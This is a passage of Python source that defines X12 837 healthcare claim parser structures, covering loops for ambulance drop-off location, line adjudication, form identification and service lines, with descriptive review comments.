req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Pick-up Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), 
Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Pick-up Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2420H = Loop( "2420H", Properties( desc="Ambulance Drop-off Location", looptype="", position="5380", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Ambulance Drop-off Location", position="5000", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["45"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="S", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( 
desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Ambulance Drop-off Location Address", position="5140", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Ambulance Drop-off Location City, State, ZIP Code", position="5200", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), 
# NOTE(review): X12 837 transaction-map data (Loop/Segment/Composite/Element tree
# built from Properties records). This appears to be machine-generated from an
# implementation guide -- confirm before hand-editing; data values are untouched here.
# The leading fragment below closes elements N404-N407 of the preceding N4 segment
# ("Ambulance Drop-off Location City, State, ZIP Code") and its enclosing loop.
position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), )
# Loop 2430 -- Line Adjudication Information (repeat 15, situational).
# Segments: SVD (adjudication detail, with C003 composite procedure identifier),
# CAS (line adjustments, up to 5, six group/reason/amount/quantity triplets),
# DTP 573 (line check or remittance date, required), AMT EAF (remaining patient
# liability, situational).
parsed_837_2430 = Loop( "2430", Properties( desc="Line Adjudication Information", looptype="", position="5400", repeat="15", req_sit="S", ), Segment( "SVD", Properties( desc="Line Adjudication Information", position="5400", repeat="1", req_sit="R", syntax="", ), Element( "SVD01", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=1, codes=[], ), ), Element( "SVD02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="03", ), Element( "SVD03-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SVD03-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SVD03-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SVD03-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SVD03-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SVD03-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( 
"SVD03-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SVD03-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SVD04", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=4, codes=[], ), ), Element( "SVD05", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "SVD06", Properties( desc="Assigned Number", req_sit="S", data_type=("N0", "1", "6"), position=6, codes=[], ), ), ), Segment( "CAS", Properties( desc="Line Adjustment", position="5450", repeat="5", req_sit="S", syntax="L050607 C0605 C0705 L080910 C0908 C1008 L111213 C1211 C1311 L141516 C1514 C1614 L171819 C1817 C1917", ), Element( "CAS01", Properties( desc="Claim Adjustment Group Code", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["CO", "CR", "OA", "PI", "PR"], ), ), Element( "CAS02", Properties( desc="Claim Adjustment Reason Code", req_sit="R", data_type=("ID", "1", "5"), position=2, codes=[], ), ), Element( "CAS03", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "CAS04", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "CAS05", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=5, codes=[], ), ), Element( "CAS06", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=6, codes=[], ), ), Element( "CAS07", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CAS08", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=8, codes=[], ), ), Element( "CAS09", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=9, codes=[], ), ), 
Element( "CAS10", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=10, codes=[], ), ), Element( "CAS11", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=11, codes=[], ), ), Element( "CAS12", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=12, codes=[], ), ), Element( "CAS13", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=13, codes=[], ), ), Element( "CAS14", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=14, codes=[], ), ), Element( "CAS15", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=15, codes=[], ), ), Element( "CAS16", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=16, codes=[], ), ), Element( "CAS17", Properties( desc="Claim Adjustment Reason Code", req_sit="S", data_type=("ID", "1", "5"), position=17, codes=[], ), ), Element( "CAS18", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=18, codes=[], ), ), Element( "CAS19", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=19, codes=[], ), ), ), Segment( "DTP", Properties( desc="Line Check or Remittance Date", position="5500", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["573"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Remaining Patient Liability", position="5505", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", 
"3"), position=1, codes=["EAF"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), )
# Loop 2440 -- Form Identification Code (repeat >1, situational).
# Segments: LQ (code list qualifier AS/UT + industry code, required) and
# FRM (supporting documentation, up to 99, required within the loop).
parsed_837_2440 = Loop( "2440", Properties( desc="Form Identification Code", looptype="", position="5510", repeat=">1", req_sit="S", ), Segment( "LQ", Properties( desc="Form Identification Code", position="5510", repeat="1", req_sit="R", syntax="C0102", ), Element( "LQ01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["AS", "UT"], ), ), Element( "LQ02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=2, codes=[], ), ), ), Segment( "FRM", Properties( desc="Supporting Documentation", position="5520", repeat="99", req_sit="R", syntax="R02030405", ), Element( "FRM01", Properties( desc="Assigned Identification", req_sit="R", data_type=("AN", "1", "20"), position=1, codes=[], ), ), Element( "FRM02", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=2, codes=["N", "W", "Y"], ), ), Element( "FRM03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "FRM04", Properties( desc="Date", req_sit="S", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "FRM05", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), ), )
# Loop 2400 -- Service Line Number (repeat 50, required). Definition continues
# well beyond this span (LX, SV1, SV5, PWK, CR1/CR3, CRC, DTP, QTY, MEA, CN1, REF...).
parsed_837_2400 = Loop( "2400", Properties( desc="Service Line Number", looptype="", position="3650", repeat="50", req_sit="R", ), Segment( "LX", Properties( desc="Service Line Number", position="3650", repeat="1", req_sit="R", syntax="", ), Element( "LX01", Properties( desc="Assigned Number", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[], ), ), ), Segment( "SV1", 
Properties( desc="Professional Service", position="3700", repeat="1", req_sit="R", syntax="P0304", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV101-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["ER", "HC", "IV", "WK"], ), ), Element( "SV101-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV101-03", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV101-04", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV101-05", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV101-06", Properties( desc="Procedure Modifier", req_sit="S", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV101-07", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV101-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=7, codes=[], ), ), ), Element( "SV102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "SV103", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["MJ", "UN"], ), ), Element( "SV104", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=4, codes=[], ), ), Element( "SV105", Properties( desc="Facility Code Value", req_sit="S", data_type=("AN", "1", "2"), position=5, codes=[], ), ), Element( "SV106", Properties( desc="Service Type Code", req_sit="N", data_type=("ID", "1", "2"), position=6, codes=[], ), ), Composite( "C004", Properties( desc="Composite Diagnosis Code 
Pointer", refdes="", repeat="", req_sit="R", seq="07", ), Element( "SV107-01", Properties( desc="Diagnosis Code Pointer", req_sit="R", data_type=("N0", "1", "2"), position=0, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-02", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=1, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-03", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=2, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), Element( "SV107-04", Properties( desc="Diagnosis Code Pointer", req_sit="S", data_type=("N0", "1", "2"), position=3, codes=[ "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", ], ), ), ), Element( "SV108", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=8, codes=[], ), ), Element( "SV109", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), Element( "SV110", Properties( desc="Multiple Procedure Code", req_sit="N", data_type=("ID", "1", "2"), position=10, codes=[], ), ), Element( "SV111", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=11, codes=["Y"], ), ), Element( "SV112", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=12, codes=["Y"], ), ), Element( "SV113", Properties( desc="Review Code", req_sit="N", data_type=("ID", "1", "2"), position=13, codes=[], ), ), Element( "SV114", Properties( desc="National or Local Assigned Review Value", req_sit="N", data_type=("AN", "1", "2"), position=14, codes=[], ), ), Element( "SV115", Properties( desc="Copay Status Code", req_sit="S", data_type=("ID", "1", "1"), position=15, codes=["0"], ), ), Element( "SV116", Properties( desc="Health Care Professional 
Shortage Area Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "SV117", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=17, codes=[], ), ), Element( "SV118", Properties( desc="Postal Code", req_sit="N", data_type=("ID", "3", "15"), position=18, codes=[], ), ), Element( "SV119", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=19, codes=[], ), ), Element( "SV120", Properties( desc="Level of Care Code", req_sit="N", data_type=("ID", "1", "1"), position=20, codes=[], ), ), Element( "SV121", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=21, codes=[], ), ), ), Segment( "SV5", Properties( desc="Durable Medical Equipment Service", position="4000", repeat="1", req_sit="S", syntax="R0405 C0604", ), Composite( "C003", Properties( desc="Composite Medical Procedure Identifier", refdes="", repeat="", req_sit="R", seq="01", ), Element( "SV501-01", Properties( desc="Product/Service ID Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=0, codes=["HC"], ), ), Element( "SV501-02", Properties( desc="Product/Service ID", req_sit="R", data_type=("AN", "1", "48"), position=1, codes=[], ), ), Element( "SV501-03", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=2, codes=[], ), ), Element( "SV501-04", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=3, codes=[], ), ), Element( "SV501-05", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=4, codes=[], ), ), Element( "SV501-06", Properties( desc="Procedure Modifier", req_sit="N", data_type=("AN", "2", "2"), position=5, codes=[], ), ), Element( "SV501-07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=6, codes=[], ), ), Element( "SV501-08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", 
"1", "48"), position=7, codes=[], ), ), ), Element( "SV502", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["DA"], ), ), Element( "SV503", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "SV504", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "SV505", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=5, codes=[], ), ), Element( "SV506", Properties( desc="Frequency Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["1", "4", "6"], ), ), Element( "SV507", Properties( desc="Prognosis Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), ), Segment( "PWK", Properties( desc="Line Supplemental Information", position="4200", repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), 
Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "PWK", Properties( desc="Durable Medical Equipment Certificate of Medical Necessity Indicator", position="4200", repeat="1", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["CT"], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AB", "AD", "AF", "AG", "NS"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="4250", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit 
or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR3", Properties( desc="Durable Medical Equipment Certification", position="4350", repeat="1", req_sit="S", syntax="P0203", ), Element( "CR301", Properties( desc="Certification Type Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["I", "R", "S"], ), ), Element( "CR302", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["MO"], ), ), Element( "CR303", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=3, codes=[], ), ), Element( "CR304", Properties( desc="Insulin Dependent Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "CR305", Properties( desc="Description", 
req_sit="N", data_type=("AN", "1", "80"), position=5, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="4500", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Hospice Employee Indicator", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["70"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["65"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", 
Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="Condition Indicator/Durable Medical Equipment", position="4500", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["09"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["38", "ZV"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["38", "ZV"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=["38", "ZV"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=["38", "ZV"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=["38", "ZV"], ), ), ), Segment( "DTP", Properties( desc="Date - Service Date", position="4550", repeat="1", req_sit="R", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["472"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( 
"DTP", Properties( desc="Date - Prescription Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="DATE - Certification Revision/Recertification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["607"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Begin Therapy Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["463"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Certification Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["461"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( 
